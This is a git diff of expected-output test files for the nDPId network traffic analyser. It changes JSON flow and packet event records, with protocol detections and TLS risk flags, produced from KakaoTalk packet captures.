-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":347,"total-skipped-flows":0,"total-l4-data-len":52012,"total-not-detected-flows":0,"total-guessed-flows":9,"total-detected-flows":29,"total-detection-updates":32,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":236,"global_ts_msec":1430069073299} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ 
diff --git a/test/results/KakaoTalk_talk.pcap.out b/test/results/KakaoTalk_talk.pcap.out
index 7078dfca5..55c83f7d0 100644
--- a/test/results/KakaoTalk_talk.pcap.out
+++ b/test/results/KakaoTalk_talk.pcap.out
@@ -1,43 +1,43 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430069140120} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069140120,"flow_last_seen":1430069140120,"flow_idle_time":7440000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":1,"thread_ts_msec":1430069140120,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069140120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069140120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAHLza0AAPwZJVQoYUrxn9jn7x00fkMsN+RcrPwfugBgApZHwAAABAQgKAAs11Jj3Xso6AAAArVkC\/4gP\/deLY5qAl+gvk5f8xql5QXAwvM9bb5tQyHwtP1GibAaltsw94jGcvj4NNAB8Nc8SXCTCPg=="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069140453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069140453,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADRbKkAALgby1Gf2OfsKGFK8H5DHTSs\/B+7LDflVgBAADqYIAAABAQgKmPgkmwALNdQ="} -00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1430069140501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":194,"pkt_l4_len":158,"thread_ts_msec":1430069140501,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAALJbK0AALgbyVWf2OfsKGFK8H5DHTSs\/B+7LDflVgBgADj7dAAABAQgKmPgkrAALNdR6AAAArVkC\/4gP\/deLY5qAl+gvk5f8hql5QTAwvM9Zf4dQyEAJD7QL56t1BA6CZFNB9CDoZPBzNcfqISYY4Bqx6IvbToog47dFxVed4MxS159GEgFcWpzNI6MS\/uDRtBTN\/KgQO5PWR5hOlzi0NPjPSZ5ZvXYRnArc8Dv9Cys="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141261,"flow_last_seen":1430069141261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069141261,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069141261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141261,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY+0AArAbF1ngcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069141403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141403,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjM1kAAPwZ\/FwoYUrx4HBryhuUAUHEB4UFlai7AUBA5CBlHAAA="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1430069141433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141433,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY\/EAArAbF1XgcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141923,"flow_last_seen":1430069141923,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1430069141923,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069141923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":157,"pkt_l4_len":121,"thread_ts_msec":1430069141923,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAI3lSkAAPwYIYQoYUrw2\/7ns5iQUZtvqJ3tQl6xegBgAe+ktAAABAQgKAAs2irXIgpc8aXEgdG89J3hpYW9taS5jb20nIGlkPScwJyBjaGlkPScwJyB0eXBlPSdnZXQnPjxwaW5nIHhtbG5zPSd1cm46eG1wcDpwaW5nJz48L3Bpbmc+PC9pcT4NCg=="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069142333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069142333,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTWOEAALQYpzDb\/uewKGFK8FGbmJFCXrF7b6ifUgBAAZ2sMAAABAQgKtcrV6gALNoo="} 
-00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1430069142373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":103,"pkt_l4_len":67,"thread_ts_msec":1430069142373,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFfWOUAALQYpqDb\/uewKGFK8FGbmJFCXrF7b6ifUgBgAZ9bAAAABAQgKtcrV6gALNoo8aXEgY2hpZD0nMCcgaWQ9JzAnIHR5cGU9J3Jlc3VsdCcvPg=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069159456,"flow_last_seen":1430069159456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069159456,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069159456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159456,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvUAAPwaqhQoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOF5AAACBAV4BAIICgALPSMAAAAAAQMDBw=="} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069159814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159814,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvkAAPwaqhAoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOEVAAACBAV4BAIICgALPYcAAAAAAQMDBw=="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} 
